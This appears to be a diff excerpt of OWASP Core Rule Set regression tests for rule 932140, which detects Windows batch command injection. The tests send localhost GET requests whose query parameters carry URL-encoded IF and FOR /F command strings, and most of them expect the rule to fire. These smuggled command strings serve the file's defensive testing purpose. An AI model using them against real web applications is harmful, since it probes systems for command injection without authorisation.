- - test_title: 932140-96
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%25_prefix%25%3D%3DSS6+++++++++GOTO+they_matched"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-97
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%5B%251%5D%3D%3D%5B%5D+++++++++++++++ECHO+Value+Missing"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-98
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%5B%251%5D+EQU+%5B%5D++++++++++++ECHO+Value+Missing"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-99
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++%282+GEQ+15%29+++++++++++++echo+%22bigger%22"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-100
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF++++++++red%3D%3Dred+++++++++++++++echo+test"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-101
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: 
"/get?foo=IF++++NOT+red%3D%3D%3Dred++++++++++++++echo+test"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-102
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+%2FI+++++Red%3D%3Dred+++++++++++++++echo+test"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-103
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+%281%29+equ+%281%29+echo+hey"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-104
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+not+%282+equ+2%29+echo+hey"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-105
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+%22%25VAR%25%22%3D%3D%25%25A+do+echo+true"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-106
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+%22%25%7E1%22+%3D%3D+%22%25%7E2%22+%28EXIT+%2FB+0%29+ELSE+%28EXIT+%2FB+1%29"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-107
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+%25n1%25+gtr+%25n2%25+echo+%25n1%25+is+greater+than+%25n2%25"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-108
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+%25n1%25+lss+%25n2%25+echo+%25n1%25+is+less+than+%25n2%25"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-109
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+%25n1%25+equ+%25n2%25+echo+%25n1%25+is+equal+to+%25n2%25"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-110
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: 
"/get?foo=if+%22%25n1%25%22+gtr+%22%25n2%25%22+echo+%22%25n1%25%22+is+greater+than+%22%25n2%25%22"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-111
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+%22%25n1%25%22+lss+%22%25n2%25%22+echo+%22%25n1%25%22+is+less+than+%22%25n2%25%22"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-112
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+%22%25n1%25%22+equ+%22%25n2%25%22+echo+%22%25n1%25%22+is+equal+to+%22%25n2%25%22"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-113
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+not+defined+n1+set+%22n1%3D0%22"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-114
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+X%251%3D%3DX%2F%3F+GOTO+Helpscreen"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-115
- desc: imported test
- stages:
- - stage: - 
input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+%22%251%22%3D%3D%22%2F%3F%22+..."
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-116
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+%5B%251%5D%3D%3D%5B%2F%3F%5D+..."
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-117
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+%22%25%7E1%22%3D%3D%22%2F%3F%22+..."
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-118
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+ERRORLEVEL+3+IF+NOT+ERRORLEVEL+4+..."
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-119
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+NOT+DEFINED+BAR+%28"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-120
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+%22%25VAR%25%22+%3D%3D+%22before%22+%28"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-121
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+%22%25VAR%25%22+%3D%3D+%22after%22+%40echo+ok"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-122
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+%22%21VAR%21%22+%3D%3D+%22after%22+%40echo+ok"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-123
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost - 
User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+not+defined+BAR+set+FOO%3D1%26+echo+FOO%3A+%25FOO%25"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-124
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+%28%251%29%3D%3D%28LTRS%29+CD+C%3A%5CWORD%5CLTRS"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-125
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+%22%251%22%3D%3D%22%22+goto+ERROR"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-126
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+%28AA%29+%3D%3D+%28AA%29+echo+same"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-127
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+%5BAA%5D+%3D%3D+%5BAA%5D+echo+same"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-128
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers: - 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=if+%22A+A%22+%3D%3D+%22A+A%22+echo+same"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-129
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+%25_prog%3A%7E-1%25+NEQ+%5C+%28Set+_prog%3D%25_prog%25%5C%29"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-130
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+EXIST+%22temp.txt%22+ECHO+found"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-131
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+NOT+EXIST+%22temp.txt%22+ECHO+not+found"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-132
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+%22%25var%25%22%3D%3D%22%22+%28SET+var%3Ddefault+value%29"
- version: HTTP/1.0 - 
output:
- log_contains: id "932140"
- - test_title: 932140-133
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+NOT+DEFINED+var+%28SET+var%3Ddefault+value%29"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-134
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+%22%25var%25%22%3D%3D%22Hello%2C+World%21%22+%28ECHO+found%29"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-135
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+%2FI+%22%25var%25%22%3D%3D%22hello%2C+world%21%22+%28+ECHO+found+%29"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-136
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=IF+%2FI+%22%25var%25%22+EQU+%221%22+ECHO+equality+with+1"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-137
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+%22%25var%25%22+NEQ+%220%22+ECHO+inequality+with+0" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-138 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+%22%25var%25%22+GEQ+%221%22+ECHO+greater+than+or+equal+to+1" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-139 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+%22%25var%25%22+LEQ+%221%22+ECHO+less+than+or+equal+to+1" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-140 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+%22%25ERRORLEVEL%25%22+NEQ+%220%22+%28ECHO+execution+failed%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-141 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: 
"/get?foo=if+not+%251+%3D%3D+%22%22+%28" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-142 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+not+%22%251%22+%3D%3D+%22%22+%28" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-143 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+not+%7B%251%7D+%3D%3D+%7B%7D" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-144 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+not+%22A%251%22+%3D%3D+%22A%22+%28" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-145 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+DEFINED+ARG+%28echo+%22It+is+defined%3A+%251%22%29+ELSE+%28echo+%22%25%251+is+not+defined%22%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-146 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if3q+hfy6e8egfxsjtewc838gsfbhwvw9qzfty3gjs86syg7y6mrpwgw4ekureakjpk6%2Flyghe9pnfekpw2yt8svzseinhs1rbkuu%2Fzq15u5wh8nj8dd+fn86qcdwzv3s9hw35e14pxgcv34dhmt1mwbxnicwudjawfqz+fphmr5vlnufdihoffpuvqwkcmom61i3lisyxg65fx+rgbnrs6e4pmbvy2xl+vwb8oct23cyypregi638dkychllvvw5kq7rolfbhk3hojxz9tthunqky9dodqbb6u8roh+firwx8kuf1dfgewcto9eljhuaoqgdk4qwxlziktaf1mw2atcmw7jvzsh1s0kngiepps54lj4wtcbfzfvbqb7y3caffhnvfrm3tbjxlywqakfqxoprh7yooguat5flg2ozx5%2Fafn7w%3D%3D" - version: HTTP/1.0 - output: - no_log_contains: id "932140" - - test_title: 932140-147 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+a%3D%3Db+foo" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-148 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if%2Fi+a%3D%3Db+foo" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-149 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%2Fi+a%3D%3Db+foo" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-150 - desc: imported test - stages: - - stage: - input: - dest_addr: 
127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%2Fi+%22a%22%3D%3D%22b%22++foo" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-151 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%2Fi+not++%22a%22%3D%3D%22b%22++foo" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-152 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+++exist+StorageServer.port+echo+yay" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-153 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%2Fi+exist+StorageServer.port+echo+yay" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-154 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=ifq+a%3D%3Db+foo" - version: HTTP/1.0 - output: - no_log_contains: id "932140" - - 
test_title: 932140-155 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=iffoo+a%3D%3Db+foo" - version: HTTP/1.0 - output: - no_log_contains: id "932140" - - test_title: 932140-156 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if3+a%3D%3Db+foo" - version: HTTP/1.0 - output: - no_log_contains: id "932140" - - test_title: 932140-157 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if3q+a%3D%3Db+foo" - version: HTTP/1.0 - output: - no_log_contains: id "932140" - - test_title: 932140-158 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2ff%20%22usebackq%22%20%25variable%20in%20%28%60command%60%29%20do%20command" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 10 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
